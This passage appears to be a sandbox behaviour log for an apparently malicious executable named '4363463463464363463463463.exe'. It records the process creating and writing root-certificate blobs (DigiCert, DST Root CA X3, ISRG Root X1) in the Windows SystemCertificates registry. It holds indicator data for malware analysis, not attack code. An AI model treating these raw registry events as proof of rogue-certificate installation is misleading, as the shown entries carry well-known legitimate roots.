6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 0f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c1320000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc35300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703080f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a82000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d0b000000010000001e000000440053005400200052006f006f0074002000430041002000580033000000090000000100000016000000301406082b0601050507030406082b06010505070301140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc415608589101d00000001000000100000004558d512eecb27464920897de7b66053030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131900000001000000100000006cf252fec3e8f20996de5d4dd9aef42420000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703085300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc252000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f00740020004300410020005800330000000f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d20000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8	4363463463464363463463463.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\CABD2A79A1076A31F21D253635CB039D4329A5E8\Blob = 0400000001000000100000000cd2f9e0da1773e9ed864da5e370e74e14000000010000001400000079b459e67bb6e5e40173800888c81a58f6e99b6e030000000100000014000000cabd2a79a1076a31f21d253635cb039d4329a5e80f00000001000000200000003f0411ede9c4477057d57e57883b1f205b20cdc0f3263129b1ee0269a2678f631900000001000000100000002fe1f70bb05d7c92335bc5e05b984da620000000010000006f0500003082056b30820353a0030201020211008210cfb0d240e3594463e0bb63828b00300d06092a864886f70d01010b0500304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f74205831301e170d3135303630343131303433385a170d3335303630343131303433385a304f310b300906035504061302555331293027060355040a1320496e7465726e65742053656375726974792052657365617263682047726f7570311530130603550403130c4953524720526f6f7420583130820222300d06092a864886f70d01010105000382020f003082020a0282020100ade82473f41437f39b9e2b57281c87bedcb7df38908c6e3ce657a078f775c2a2fef56a6ef6004f28dbde68866c4493b6b163fd14126bbf1fd2ea319b217ed1333cba48f5dd79dfb3b8ff12f1219a4bc18a8671694a66666c8f7e3c70bfad292206f3e4c0e680aee24b8fb7997e94039fd347977c99482353e838ae4f0a6f832ed149578c8074b6da2fd0388d7b0370211b75f2303cfa8faeddda63abeb164fc28e114b7ecf0be8ffb5772ef4b27b4ae04c12250c708d0329a0e15324ec13d9ee19bf10b34a8c3f89a36151deac870794f46371ec2ee26f5b9881e1895c34796c76ef3b906279e6dba49a2f26c5d010e10eded9108e16fbb7f7a8f7c7e50207988f360895e7e237960d36759efb0e72b11d9bbc03f94905d881dd05b42ad641e9ac0176950a0fd8dfd5bd121f352f28176cd298c1a80964776e4737baceac595e689d7f72d689c50641293e593edd26f524c911a75aa34c401f46a199b5a73a516e863b9e7d72a712057859ed3e5178150b038f8dd02f05b23e7b4a1c4b730512fcc6eae050137c439374b3ca74e78e1f0108d030d45b7136b407bac130305c48b7823b98a67d608aa2a32982ccbabd83041ba2830341a1d605f11bc2b6f0a87c863b46a8482a88dc769a76bf1f6aa53d198feb38f364dec82b0d0a28fff7dbe21542d422d0275de179fe18e77088ad4ee6d98b3ac6dd27516effbc64f533434f0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e0416041479b459e67bb6e5e40173800888c81a58f6e99b6e300d06092a864886f70d01010b05000382020100551f58a9bcb2a850d00cb1d81a6920272908ac61755c8a6ef882e5692fd5f6564bb9b8731059d321977ee74c71fbb2d260ad39a80bea17215685f1500e59ebcee059e9bac915ef869d8f8480f6e4e99190dc179b621b45f06695d27c6fc2ea3bef1fcfcbd6ae27f1a9b0c8aefd7d7e9afa2204ebffd97fea912b22b1170e8ff28a345b58d8fc01c954b9b826cc8a8833894c2d843c82dfee965705ba2cbbf7c4b7c74e3b82be31c822737392d1c280a43939103323824c3c9f86b255981dbe29868c229b9ee26b3b573a82704ddc09c789cb0a074d6ce85d8ec9efceabc7bbb52b4e45d64ad026cce572ca086aa595e315a1f7a4edc92c5fa5fbffac28022ebed77bbbe3717b9016d3075e46537c3707428cd3c4969cd599b52ae0951a8048ae4c3907cecc47a452952bbab8fbadd233537de51d4d6dd5a1b1c7426fe64027355ca328b7078de78d3390e7239ffb509c796c46d5b415b3966e7e9b0c963ab8522d3fd65be1fb08c284fe24a8a389daac6ae1182ab1a843615bd31fdc3b8d76f22de88d75df17336c3d53fb7bcb415fffdca2d06138e196b8ac5d8b37d775d533c09911ae9d41c1727584be0241425f67244894d19b27be073fb9b84f817451e17ab7ed9d23e2bee0d52804133c31039edd7a6c8fc60718c67fde478e3f289e0406cfa5543477bdec899be91743df5bdb5ffe8e1e57a2cd409d7e6222dade1827	4363463463464363463463463.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	4363463463464363463463463.exe
